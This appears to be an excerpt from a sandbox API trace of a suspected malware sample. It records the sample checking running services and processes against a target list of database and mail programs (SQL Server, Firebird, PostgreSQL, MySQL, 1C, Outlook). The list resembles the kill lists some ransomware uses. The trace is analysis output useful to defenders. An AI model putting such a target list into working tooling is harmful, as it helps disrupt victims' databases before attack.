	[0142.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0142.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0142.826] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0142.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0142.827] lstrlenW (lpString="Dhcp") returned 4
	[0142.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0142.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0142.827] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0142.827] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0142.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0142.827] lstrlenW (lpString="Dnscache") returned 8
	[0142.827] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0142.827] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0142.827] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0142.827] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0142.827] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0142.827] lstrlenW (lpString="DPS") returned 3
	[0142.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0142.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0142.828] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0142.828] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0142.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0142.828] lstrlenW (lpString="eventlog") returned 8
	[0142.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0142.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0142.828] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0142.828] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0142.828] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0142.828] lstrlenW (lpString="EventSystem") returned 11
	[0142.828] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0142.828] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0142.828] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0142.829] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0142.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0142.829] lstrlenW (lpString="gpsvc") returned 5
	[0142.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0142.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0142.829] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0142.829] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0142.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0142.829] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0142.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0142.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0142.829] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0142.829] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0142.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0142.829] lstrlenW (lpString="lmhosts") returned 7
	[0142.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0142.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0142.829] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0142.829] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0142.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0142.829] lstrlenW (lpString="MMCSS") returned 5
	[0142.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0142.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0142.829] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0142.829] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0142.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0142.829] lstrlenW (lpString="MpsSvc") returned 6
	[0142.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0142.829] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0142.829] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0142.829] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0142.829] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0142.829] lstrlenW (lpString="NlaSvc") returned 6
	[0142.829] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0142.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0142.830] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0142.830] lstrlenW (lpString="nsi") returned 3
	[0142.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0142.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0142.830] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0142.830] lstrlenW (lpString="PcaSvc") returned 6
	[0142.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0142.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0142.830] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0142.830] lstrlenW (lpString="PlugPlay") returned 8
	[0142.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0142.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0142.830] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0142.830] lstrlenW (lpString="Power") returned 5
	[0142.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0142.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0142.830] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0142.830] lstrlenW (lpString="ProfSvc") returned 7
	[0142.830] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0142.830] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0142.830] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0142.830] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0142.831] lstrlenW (lpString="RpcEptMapper") returned 12
	[0142.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0142.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0142.831] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0142.831] lstrlenW (lpString="RpcSs") returned 5
	[0142.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0142.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0142.831] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0142.831] lstrlenW (lpString="SamSs") returned 5
	[0142.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0142.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0142.831] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0142.831] lstrlenW (lpString="Schedule") returned 8
	[0142.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0142.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0142.831] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0142.831] lstrlenW (lpString="SENS") returned 4
	[0142.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0142.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0142.831] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0142.831] lstrlenW (lpString="ShellHWDetection") returned 16
	[0142.831] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0142.831] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0142.831] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0142.832] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0142.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0142.832] lstrlenW (lpString="Spooler") returned 7
	[0142.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0142.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0142.832] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0142.832] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0142.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0142.832] lstrlenW (lpString="Themes") returned 6
	[0142.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0142.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0142.832] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0142.832] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0142.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0142.832] lstrlenW (lpString="UxSms") returned 5
	[0142.832] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0142.832] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0142.832] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0142.832] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0142.832] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0142.832] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0142.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3ac
	[0142.834] Process32FirstW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0142.834] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0142.834] lstrlenW (lpString="System") returned 6
	[0142.835] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0142.835] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0142.835] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0142.835] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0142.835] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0142.835] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0142.835] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0142.835] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0142.835] lstrlenW (lpString="smss.exe") returned 8
	[0142.835] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0142.835] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0142.835] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0142.835] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0142.835] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0142.835] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0142.835] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0142.835] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0142.837] lstrlenW (lpString="csrss.exe") returned 9
	[0142.837] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0142.837] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0142.837] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0142.837] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0142.837] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0142.837] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0142.837] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0142.837] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0142.837] lstrlenW (lpString="wininit.exe") returned 11
	[0142.837] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0142.837] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0142.837] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0142.837] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0142.837] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0142.837] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0142.837] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0142.837] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0142.838] lstrlenW (lpString="csrss.exe") returned 9
	[0142.838] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0142.838] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0142.838] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0142.838] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0142.838] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0142.838] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0142.838] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0142.838] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0142.838] lstrlenW (lpString="winlogon.exe") returned 12
	[0142.838] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0142.838] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0142.838] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0142.838] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0142.838] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0142.838] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0142.838] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0142.838] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0142.839] lstrlenW (lpString="services.exe") returned 12
	[0142.839] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0142.839] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0142.839] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0142.839] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0142.839] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0142.839] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0142.839] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0142.839] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0142.839] lstrlenW (lpString="lsass.exe") returned 9
	[0142.839] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0142.839] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0142.839] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0142.839] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0142.839] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0142.839] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0142.839] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0142.839] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0142.840] lstrlenW (lpString="lsm.exe") returned 7
	[0142.840] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0142.840] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0142.840] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0142.840] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0142.840] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0142.840] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0142.840] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0142.840] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.840] lstrlenW (lpString="svchost.exe") returned 11
	[0142.840] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.840] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.840] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.840] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0142.840] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0142.840] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0142.840] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0142.840] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.841] lstrlenW (lpString="svchost.exe") returned 11
	[0142.841] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.841] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.841] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.841] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0142.841] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0142.841] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0142.841] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0142.841] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.842] lstrlenW (lpString="svchost.exe") returned 11
	[0142.842] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0142.842] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.842] lstrlenW (lpString="svchost.exe") returned 11
	[0142.842] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0142.842] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0142.842] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.843] lstrlenW (lpString="svchost.exe") returned 11
	[0142.843] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.843] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.843] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.843] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0142.843] lstrlenW (lpString="audiodg.exe") returned 11
	[0142.843] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.843] lstrlenW (lpString="svchost.exe") returned 11
